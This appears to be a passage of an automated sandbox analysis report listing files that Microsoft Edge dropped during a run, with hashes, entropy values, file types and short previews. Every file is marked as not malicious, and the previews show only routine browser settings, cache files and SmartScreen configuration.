                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                            Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                            MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                            SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                            SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                            SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:117.0.2045.47
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6820
                                                                                                                                                                                                            Entropy (8bit):5.794617719539494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:iaqkHfxdYZ5ih/cI9URLl8RotohMFVvlwhHe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akZymeiRUeh56qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                            MD5:F592E7A06122C6CB7B476348A8CA904A
                                                                                                                                                                                                            SHA1:F331295354250EE23851CF8CCDFBB9C366F0376C
                                                                                                                                                                                                            SHA-256:339BDFF795D2B00B43B742C1ECEF48E1D64C39C0E7EDA975634E70AB9E8FA3CF
                                                                                                                                                                                                            SHA-512:FA7716B97D70B7A9370AFF992F14C4DAE03808E95A0AD7641853D6AC5DC3EE9878B5CA4E951DDBC74BCA627AE661667CBC19AB18F2A84B10E4CCB73C8D96D3C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABGb6U6oS03TLmZvvwWLF4cEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABqHLT+7OmIhzwQT+obLl8YwOVJW1rOSudUR0lJbJJRCwAAAAA
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6820
                                                                                                                                                                                                            Entropy (8bit):5.794617719539494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:iaqkHfxdYZ5ih/cI9URLl8RotohMFVvlwhHe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akZymeiRUeh56qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                            MD5:F592E7A06122C6CB7B476348A8CA904A
                                                                                                                                                                                                            SHA1:F331295354250EE23851CF8CCDFBB9C366F0376C
                                                                                                                                                                                                            SHA-256:339BDFF795D2B00B43B742C1ECEF48E1D64C39C0E7EDA975634E70AB9E8FA3CF
                                                                                                                                                                                                            SHA-512:FA7716B97D70B7A9370AFF992F14C4DAE03808E95A0AD7641853D6AC5DC3EE9878B5CA4E951DDBC74BCA627AE661667CBC19AB18F2A84B10E4CCB73C8D96D3C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABGb6U6oS03TLmZvvwWLF4cEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABqHLT+7OmIhzwQT+obLl8YwOVJW1rOSudUR0lJbJJRCwAAAAA
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6820
                                                                                                                                                                                                            Entropy (8bit):5.794617719539494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:iaqkHfxdYZ5ih/cI9URLl8RotohMFVvlwhHe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akZymeiRUeh56qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                            MD5:F592E7A06122C6CB7B476348A8CA904A
                                                                                                                                                                                                            SHA1:F331295354250EE23851CF8CCDFBB9C366F0376C
                                                                                                                                                                                                            SHA-256:339BDFF795D2B00B43B742C1ECEF48E1D64C39C0E7EDA975634E70AB9E8FA3CF
                                                                                                                                                                                                            SHA-512:FA7716B97D70B7A9370AFF992F14C4DAE03808E95A0AD7641853D6AC5DC3EE9878B5CA4E951DDBC74BCA627AE661667CBC19AB18F2A84B10E4CCB73C8D96D3C4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABGb6U6oS03TLmZvvwWLF4cEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABqHLT+7OmIhzwQT+obLl8YwOVJW1rOSudUR0lJbJJRCwAAAAA
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                            Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                            MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                            SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                            SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                            SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.012096502606932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsEllllkXl:/M/6
                                                                                                                                                                                                            MD5:259E7ED5FB3C6C90533B963DA5B2FC1B
                                                                                                                                                                                                            SHA1:DF90EABDA434CA50828ABB039B4F80B7F051EC77
                                                                                                                                                                                                            SHA-256:35BB2F189C643DCF52ECF037603D104035ECDC490BF059B7736E58EF7D821A09
                                                                                                                                                                                                            SHA-512:9D401053AC21A73863B461B0361DF1A17850F42FD5FC7A77763A124AA33F2E9493FAD018C78CDFF63CA10F6710E53255CE891AD6EC56EC77D770C4630F274933
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):8192
                                                                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):262512
                                                                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:LsNlVkat:Ls3Oat
                                                                                                                                                                                                            MD5:461FDBDF6F18584BFC6D0260541ED627
                                                                                                                                                                                                            SHA1:5755CEC4397B97358AECE5D821DA43C8EF1D3105
                                                                                                                                                                                                            SHA-256:17C143B89E7EAAAF0718CE0DDF531B26D8277E4E2016B0CC5B5BBF490DE74BD7
                                                                                                                                                                                                            SHA-512:A02261F1BFD07C680D9246E7CCF2FBF6587AF7A915A3FDDC0B0282AED551A05432F3E23C12C0B37348B1995C2FAA0E548B2E4A1E002F376CE808E98D4D0F49C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..........................................l.`./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):47
                                                                                                                                                                                                            Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                            MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                            SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                            SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                            SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35
                                                                                                                                                                                                            Entropy (8bit):4.014438730983427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                            MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                            SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                            SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                            SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29
                                                                                                                                                                                                            Entropy (8bit):3.922828737239167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                            MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                            SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                            SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                            SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:customSynchronousLookupUris_0
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35302
                                                                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18
                                                                                                                                                                                                            Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                                                                            MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                                                                            SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                                                                            SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                                                                            SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:edgeSettings_2.0-0
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3581
                                                                                                                                                                                                            Entropy (8bit):4.459693941095613
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                            MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                            SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                            SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                            SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):47
                                                                                                                                                                                                            Entropy (8bit):4.493433469104717
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                                                                            MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                                                                            SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                                                                            SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                                                                            SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35302
                                                                                                                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):50
                                                                                                                                                                                                            Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                            MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                            SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                            SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                            SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:topTraffic_170540185939602997400506234197983529371
                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):575056
                                                                                                                                                                                                            Entropy (8bit):7.999649474060713
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                            MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                            SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                            SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                            SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                            Malicious:false
